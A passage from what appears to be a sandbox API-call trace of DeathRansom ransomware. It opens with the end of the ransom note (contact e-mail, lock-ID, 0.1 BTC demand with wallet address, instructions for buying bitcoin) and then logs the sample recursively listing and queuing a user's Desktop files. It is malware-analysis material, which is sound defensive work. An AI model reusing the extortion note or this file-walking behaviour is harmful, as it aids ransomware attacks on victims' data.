e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.904] WriteFile (in: hFile=0x7ac, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17de6c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17de6c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.905] CloseHandle (hObject=0x7ac) returned 1 [0073.905] GetProcessHeap () returned 0x280000 [0073.905] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b50020 | out: hHeap=0x280000) returned 1 [0073.905] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x815ab880, ftCreationTime.dwHighDateTime=0x1d4ce32, ftLastAccessTime.dwLowDateTime=0x81bd2240, ftLastAccessTime.dwHighDateTime=0x1d4c8ec, ftLastWriteTime.dwLowDateTime=0x81bd2240, ftLastWriteTime.dwHighDateTime=0x1d4c8ec, nFileSizeHigh=0x0, nFileSizeLow=0x5359, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="98KbAKVzLCjvlVD.mp3", cAlternateFileName="98KBAK~1.MP3")) returned 1 [0073.905] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\98KbAKVzLCjvlVD.mp3") returned 61 [0073.905] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbaa6c10, ftCreationTime.dwHighDateTime=0x1d4d117, ftLastAccessTime.dwLowDateTime=0x8056a850, ftLastAccessTime.dwHighDateTime=0x1d4cd69, ftLastWriteTime.dwLowDateTime=0x8056a850, ftLastWriteTime.dwHighDateTime=0x1d4cd69, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="aeutpKYrnLsv9u1", cAlternateFileName="AEUTPK~1")) returned 1 [0073.905] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1") returned 57 [0073.905] lstrcmpW (lpString1="aeutpKYrnLsv9u1", lpString2="..") returned 1 [0073.905] lstrcmpW (lpString1="aeutpKYrnLsv9u1", lpString2=".") returned 1 [0073.905] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b50020 [0073.905] lstrcpyW (in: lpString1=0x8b50020, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1" [0073.905] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 41 [0073.905] QueueUserWorkItem (Function=0x40a710, Context=0x8b50020, Flags=0x0) returned 1 [0073.905] GetProcessHeap () returned 0x280000 [0073.905] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b60028 [0073.906] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\*") returned 59 [0073.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbaa6c10, ftCreationTime.dwHighDateTime=0x1d4d117, ftLastAccessTime.dwLowDateTime=0x8056a850, ftLastAccessTime.dwHighDateTime=0x1d4cd69, ftLastWriteTime.dwLowDateTime=0x8056a850, ftLastWriteTime.dwHighDateTime=0x1d4cd69, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0073.906] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\.") returned 59 [0073.906] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.906] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.906] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbaa6c10, ftCreationTime.dwHighDateTime=0x1d4d117, ftLastAccessTime.dwLowDateTime=0x8056a850, ftLastAccessTime.dwHighDateTime=0x1d4cd69, ftLastWriteTime.dwLowDateTime=0x8056a850, ftLastWriteTime.dwHighDateTime=0x1d4cd69, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.906] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\..") returned 60 [0073.906] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.906] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ed70820, ftCreationTime.dwHighDateTime=0x1d4d012, ftLastAccessTime.dwLowDateTime=0x74ac3b00, ftLastAccessTime.dwHighDateTime=0x1d4cdeb, ftLastWriteTime.dwLowDateTime=0x74ac3b00, ftLastWriteTime.dwHighDateTime=0x1d4cdeb, nFileSizeHigh=0x0, nFileSizeLow=0x17bdf, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ApDQZcKbc6uihxPt.mp3", cAlternateFileName="APDQZC~1.MP3")) returned 1 [0073.907] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\ApDQZcKbc6uihxPt.mp3") returned 78 [0073.907] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f5d32c0, ftCreationTime.dwHighDateTime=0x1d4c9d0, ftLastAccessTime.dwLowDateTime=0xa2c08c50, ftLastAccessTime.dwHighDateTime=0x1d4d51e, ftLastWriteTime.dwLowDateTime=0xa2c08c50, ftLastWriteTime.dwHighDateTime=0x1d4d51e, nFileSizeHigh=0x0, nFileSizeLow=0x15265, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="kv_sY.pps", cAlternateFileName="")) returned 1 [0073.907] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\kv_sY.pps") returned 67 [0073.907] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3f75d00, ftCreationTime.dwHighDateTime=0x1d4d09c, ftLastAccessTime.dwLowDateTime=0xe2aac470, ftLastAccessTime.dwHighDateTime=0x1d4d488, ftLastWriteTime.dwLowDateTime=0xe2aac470, ftLastWriteTime.dwHighDateTime=0x1d4d488, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lnC8VFH_7XvA0rvnIlk_", cAlternateFileName="LNC8VF~1")) returned 1 [0073.907] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_") returned 78 [0073.907] lstrcmpW (lpString1="lnC8VFH_7XvA0rvnIlk_", lpString2="..") returned 1 [0073.907] lstrcmpW (lpString1="lnC8VFH_7XvA0rvnIlk_", lpString2=".") returned 1 [0073.907] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8aa00b0 [0073.908] lstrcpyW (in: lpString1=0x8aa00b0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_" [0073.908] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 42 [0073.908] QueueUserWorkItem (Function=0x40a710, Context=0x8aa00b0, Flags=0x0) returned 1 [0073.908] GetProcessHeap () returned 0x280000 [0073.908] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ab00b8 [0073.909] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\*") returned 80 [0073.909] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\*", lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3f75d00, ftCreationTime.dwHighDateTime=0x1d4d09c, ftLastAccessTime.dwLowDateTime=0xe2aac470, ftLastAccessTime.dwHighDateTime=0x1d4d488, ftLastWriteTime.dwLowDateTime=0xe2aac470, ftLastWriteTime.dwHighDateTime=0x1d4d488, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0073.910] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\.") returned 80 [0073.910] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.910] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.910] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3f75d00, ftCreationTime.dwHighDateTime=0x1d4d09c, ftLastAccessTime.dwLowDateTime=0xe2aac470, ftLastAccessTime.dwHighDateTime=0x1d4d488, ftLastWriteTime.dwLowDateTime=0xe2aac470, ftLastWriteTime.dwHighDateTime=0x1d4d488, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.910] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\..") returned 81 [0073.910] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.910] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd67be9e0, ftCreationTime.dwHighDateTime=0x1d4cd80, ftLastAccessTime.dwLowDateTime=0x66529140, ftLastAccessTime.dwHighDateTime=0x1d4c890, ftLastWriteTime.dwLowDateTime=0x66529140, ftLastWriteTime.dwHighDateTime=0x1d4c890, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="AHzFw9uT7csYzjH-YBK.mp3", cAlternateFileName="AHZFW9~1.MP3")) returned 1 [0073.910] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\AHzFw9uT7csYzjH-YBK.mp3") returned 102 [0073.910] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb481b000, ftCreationTime.dwHighDateTime=0x1d4d513, ftLastAccessTime.dwLowDateTime=0xfac7e240, ftLastAccessTime.dwHighDateTime=0x1d4d07d, ftLastWriteTime.dwLowDateTime=0xfac7e240, ftLastWriteTime.dwHighDateTime=0x1d4d07d, nFileSizeHigh=0x0, nFileSizeLow=0x7f6e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LnpX_dH.docx", cAlternateFileName="LNPX_D~1.DOC")) returned 1 [0073.910] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\LnpX_dH.docx") returned 91 [0073.910] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x268a9cd0, ftCreationTime.dwHighDateTime=0x1d4c997, ftLastAccessTime.dwLowDateTime=0x5363bcd0, ftLastAccessTime.dwHighDateTime=0x1d4d00b, ftLastWriteTime.dwLowDateTime=0x5363bcd0, ftLastWriteTime.dwHighDateTime=0x1d4d00b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="vPe92_uuRvFYmIY", cAlternateFileName="VPE92_~1")) returned 1 [0073.910] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY") returned 94 [0073.911] lstrcmpW (lpString1="vPe92_uuRvFYmIY", lpString2="..") returned 1 [0073.911] lstrcmpW (lpString1="vPe92_uuRvFYmIY", lpString2=".") returned 1 [0073.911] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ac00c0 [0073.912] lstrcpyW (in: lpString1=0x8ac00c0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY" [0073.912] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 43 [0073.912] QueueUserWorkItem (Function=0x40a710, Context=0x8ac00c0, Flags=0x0) returned 1 [0073.912] GetProcessHeap () returned 0x280000 [0073.912] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ad00c8 [0073.913] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\*") returned 96 [0073.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\*", lpFindFileData=0x17d718 | out: lpFindFileData=0x17d718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x268a9cd0, ftCreationTime.dwHighDateTime=0x1d4c997, ftLastAccessTime.dwLowDateTime=0x5363bcd0, ftLastAccessTime.dwHighDateTime=0x1d4d00b, ftLastWriteTime.dwLowDateTime=0x5363bcd0, ftLastWriteTime.dwHighDateTime=0x1d4d00b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2738 [0073.913] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\.") returned 96 [0073.913] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.913] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.913] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x17d718 | out: lpFindFileData=0x17d718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x268a9cd0, ftCreationTime.dwHighDateTime=0x1d4c997, ftLastAccessTime.dwLowDateTime=0x5363bcd0, ftLastAccessTime.dwHighDateTime=0x1d4d00b, ftLastWriteTime.dwLowDateTime=0x5363bcd0, ftLastWriteTime.dwHighDateTime=0x1d4d00b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.913] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\..") returned 97 [0073.913] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.913] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x17d718 | out: lpFindFileData=0x17d718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb1937780, ftCreationTime.dwHighDateTime=0x1d4d454, ftLastAccessTime.dwLowDateTime=0x1796a950, ftLastAccessTime.dwHighDateTime=0x1d4cb57, ftLastWriteTime.dwLowDateTime=0x1796a950, ftLastWriteTime.dwHighDateTime=0x1d4cb57, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="5q 1", cAlternateFileName="5Q1~1")) returned 1 [0073.913] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1") returned 99 [0073.913] lstrcmpW (lpString1="5q 1", lpString2="..") returned 1 [0073.913] lstrcmpW (lpString1="5q 1", lpString2=".") returned 1 [0073.913] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ae10d8 [0073.914] lstrcpyW (in: lpString1=0x8ae10d8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1" [0073.914] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 44 [0073.914] QueueUserWorkItem (Function=0x40a710, Context=0x8ae10d8, Flags=0x0) returned 1 [0073.914] GetProcessHeap () returned 0x280000 [0073.914] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8af10e0 [0073.915] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\*") returned 101 [0073.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\*", lpFindFileData=0x17d4a0 | out: lpFindFileData=0x17d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb1937780, ftCreationTime.dwHighDateTime=0x1d4d454, ftLastAccessTime.dwLowDateTime=0x1796a950, ftLastAccessTime.dwHighDateTime=0x1d4cb57, ftLastWriteTime.dwLowDateTime=0x1796a950, ftLastWriteTime.dwHighDateTime=0x1d4cb57, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2778 [0073.916] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\.") returned 101 [0073.916] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.916] FindNextFileW (in: hFindFile=0x2b2778, lpFindFileData=0x17d4a0 | out: lpFindFileData=0x17d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb1937780, ftCreationTime.dwHighDateTime=0x1d4d454, ftLastAccessTime.dwLowDateTime=0x1796a950, ftLastAccessTime.dwHighDateTime=0x1d4cb57, ftLastWriteTime.dwLowDateTime=0x1796a950, ftLastWriteTime.dwHighDateTime=0x1d4cb57, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.916] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\..") returned 102 [0073.916] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.916] FindNextFileW (in: hFindFile=0x2b2778, lpFindFileData=0x17d4a0 | out: lpFindFileData=0x17d4a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b83730, ftCreationTime.dwHighDateTime=0x1d4c6e6, ftLastAccessTime.dwLowDateTime=0x8aba0a60, ftLastAccessTime.dwHighDateTime=0x1d4d3b0, ftLastWriteTime.dwLowDateTime=0x8aba0a60, ftLastWriteTime.dwHighDateTime=0x1d4d3b0, nFileSizeHigh=0x0, nFileSizeLow=0xf82e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="HrxLxYDTaNs.swf", cAlternateFileName="HRXLXY~1.SWF")) returned 1 [0073.916] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\HrxLxYDTaNs.swf") returned 115 [0073.916] FindNextFileW (in: hFindFile=0x2b2778, lpFindFileData=0x17d4a0 | out: lpFindFileData=0x17d4a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f4c0b20, ftCreationTime.dwHighDateTime=0x1d4c668, ftLastAccessTime.dwLowDateTime=0x9f9e70a0, ftLastAccessTime.dwHighDateTime=0x1d4cc5e, ftLastWriteTime.dwLowDateTime=0x9f9e70a0, ftLastWriteTime.dwHighDateTime=0x1d4cc5e, nFileSizeHigh=0x0, nFileSizeLow=0xdc76, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="JosdybsYa9WW8YJ6_C.xlsx", cAlternateFileName="JOSDYB~1.XLS")) returned 1 [0073.916] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\JosdybsYa9WW8YJ6_C.xlsx") returned 123 [0073.916] FindNextFileW (in: hFindFile=0x2b2778, lpFindFileData=0x17d4a0 | out: lpFindFileData=0x17d4a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf6a160, ftCreationTime.dwHighDateTime=0x1d4ca1a, ftLastAccessTime.dwLowDateTime=0xec84a1f0, ftLastAccessTime.dwHighDateTime=0x1d4d20d, ftLastWriteTime.dwLowDateTime=0xec84a1f0, ftLastWriteTime.dwHighDateTime=0x1d4d20d, nFileSizeHigh=0x0, nFileSizeLow=0x9c55, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="kUy2s6gipM.png", cAlternateFileName="KUY2S6~1.PNG")) returned 1 [0073.916] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\kUy2s6gipM.png") returned 114 [0073.916] FindNextFileW (in: hFindFile=0x2b2778, lpFindFileData=0x17d4a0 | out: lpFindFileData=0x17d4a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82ac3920, ftCreationTime.dwHighDateTime=0x1d4d12f, ftLastAccessTime.dwLowDateTime=0x54cb54e0, ftLastAccessTime.dwHighDateTime=0x1d4d144, ftLastWriteTime.dwLowDateTime=0x54cb54e0, ftLastWriteTime.dwHighDateTime=0x1d4d144, nFileSizeHigh=0x0, nFileSizeLow=0x6439, 